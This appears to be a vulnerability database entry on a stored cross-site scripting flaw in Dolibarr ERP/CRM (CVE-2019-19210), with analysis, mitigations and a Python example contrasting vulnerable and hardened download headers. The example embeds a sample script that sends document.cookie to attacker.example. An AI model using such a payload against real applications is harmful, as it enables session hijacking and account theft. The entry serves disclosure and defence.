CVE-2019-19210 in Dolibarr ERP/CRM

Summary

by MITRE

Dolibarr ERP/CRM before 10.0.3 allows XSS because uploaded HTML documents are served as text/html despite being renamed to .noexe files.


Analysis

by VulDB Data Team • 05/10/2025

The vulnerability identified as CVE-2019-19210 affects Dolibarr ERP/CRM versions prior to 10.0.3 and is a stored cross-site scripting flaw rooted in how uploaded HTML documents are stored and served. Dolibarr accepts HTML uploads and renames them to a .noexe extension, but when the stored file is later requested it is still delivered with a text/html Content-Type. The root cause is therefore not missing output encoding of application data but a file-serving path that lets the original upload dictate how the browser treats the response, so any script embedded in the document runs in the application's origin for whoever opens it.

Technically, the weakness sits between the upload handler and the file-serving endpoint. The rename to .noexe is a server-side safeguard meant to stop the web server from executing or rendering the upload as the file type it was submitted as. The serving endpoint, however, still responds with a text/html content type for these files, so the browser parses the .noexe file as a normal web page instead of treating it as an inert download. An attacker who can upload a document (for example as an attachment to a record) can therefore embed JavaScript in an HTML file, and that script executes in the browser of every Dolibarr user who later opens the attachment through the application.

The operational impact goes beyond defacement because the payload is stored: it persists in the uploaded file and fires each time a user views it, giving the attacker a durable foothold rather than a one-shot reflected XSS. Since the script runs in Dolibarr's own origin, it has whatever access the viewing user has: it can issue authenticated requests to the application on the victim's behalf, read page content, redirect the user to an attacker-controlled site, and, where the session cookie is not marked HttpOnly, exfiltrate it for session hijacking. If an administrator opens the attachment, the attacker effectively acts with administrative rights, which is how this class of bug turns into privilege escalation. In an ERP/CRM deployment the affected data includes customer, invoice and supplier records, so the exposure is business data as well as user accounts.

Security professionals should classify this vulnerability as CWE-79 - Cross-site Scripting, one of the most prevalent web application weaknesses. On the attacker side it maps to ATT&CK technique T1059.007 - Command and Scripting Interpreter: JavaScript, since the payload is JavaScript executed by the victim's browser. The underlying defect is improper handling of uploaded file types and of the Content-Type and Content-Disposition sent when they are served. The immediate fix is to update to Dolibarr 10.0.3 or later. Independently of the patch, user-supplied files should be served as downloads rather than rendered: a non-renderable Content-Type such as application/octet-stream, a Content-Disposition: attachment header, and X-Content-Type-Options: nosniff so the browser does not re-sniff the body as HTML. Hosting user content on a separate origin from the application adds a further layer of defense in depth.
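The flawed serving logic described above, and the hardened headers from the mitigation paragraph, modelled side by side as an added Python example. This is not Dolibarr's own code: the filenames, the sample payload and the helper names (`vulnerable_headers`, `hardened_headers`, `audit_headers`) are assumptions made for illustration. The `audit_headers` function is the check a practitioner can point at the headers of a real response to confirm an instance no longer renders uploads inline.

```python
"""Vulnerable vs hardened response headers for serving an uploaded file.

Added example (not Dolibarr code). It models the CVE-2019-19210 pattern: the
upload is stored as <name>.noexe, but the serving code derives Content-Type
from the original extension and sends the file inline as text/html.
"""
import mimetypes
import posixpath
import re

NOEXE_SUFFIX = ".noexe"

# Constructed sample upload: an HTML attachment carrying a cookie-stealing script.
STORED_NAME = "quote_2019.html" + NOEXE_SUFFIX
STORED_BODY = (
    b"<html><body><script>"
    b"new Image().src='https://attacker.example/c?'+encodeURIComponent(document.cookie)"
    b"</script></body></html>"
)

# Content types a browser will parse as an active document (scripts can run).
RENDERABLE_TYPES = {
    "text/html", "application/xhtml+xml", "image/svg+xml",
    "text/xml", "application/xml",
}


def original_name(stored_name):
    """Undo the .noexe rename to recover the name the uploader chose."""
    if stored_name.endswith(NOEXE_SUFFIX):
        return stored_name[: -len(NOEXE_SUFFIX)]
    return stored_name


def vulnerable_headers(stored_name):
    """Flawed pattern (hypothetical): the rename only protects the server side.

    Content-Type is guessed from the original extension, so quote_2019.html.noexe
    goes out as text/html and inline; the browser renders it in the app origin.
    """
    name = original_name(stored_name)
    ctype, _ = mimetypes.guess_type(name)
    return {
        "Content-Type": ctype or "application/octet-stream",
        "Content-Disposition": 'inline; filename="%s"' % name,
    }


def hardened_headers(stored_name):
    """Serve user uploads as inert downloads regardless of their extension."""
    name = original_name(stored_name)
    # Keep only the basename and a conservative character set for the filename
    # parameter so the header cannot be used for path tricks or header injection.
    safe = re.sub(r"[^A-Za-z0-9._-]", "_", posixpath.basename(name))
    return {
        "Content-Type": "application/octet-stream",
        "Content-Disposition": 'attachment; filename="%s"' % safe,
        "X-Content-Type-Options": "nosniff",  # no MIME sniffing back to HTML
        "Content-Security-Policy": "default-src 'none'; sandbox",  # belt and braces
    }


def audit_headers(headers):
    """Return a list of findings for a file-download response; [] means safe.

    Usable against headers captured from a live instance (e.g. requests' resp.headers).
    """
    findings = []
    h = {k.lower(): v for k, v in headers.items()}
    ctype = h.get("content-type", "").split(";")[0].strip().lower()
    disposition = h.get("content-disposition", "inline").split(";")[0].strip().lower()
    if ctype in RENDERABLE_TYPES:
        findings.append("active content type: %s" % ctype)
    if disposition != "attachment":
        findings.append("served inline rather than as an attachment")
    if h.get("x-content-type-options", "").strip().lower() != "nosniff":
        findings.append("missing X-Content-Type-Options: nosniff")
    return findings


if __name__ == "__main__":
    for label, hdrs in (("vulnerable", vulnerable_headers(STORED_NAME)),
                        ("hardened", hardened_headers(STORED_NAME))):
        print(label, hdrs, audit_headers(hdrs) or "OK")
```

The audit deliberately treats SVG and XML as active types as well as HTML, since both can carry script and would be rendered if served inline. An instance is only considered fixed when the audit returns no findings for every file-download endpoint, not just for .html uploads.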

Reservation

11/21/2019

Moderation

accepted

CPE

ready

EPSS

0.00928

KEV

no

Activities

very low

Sources
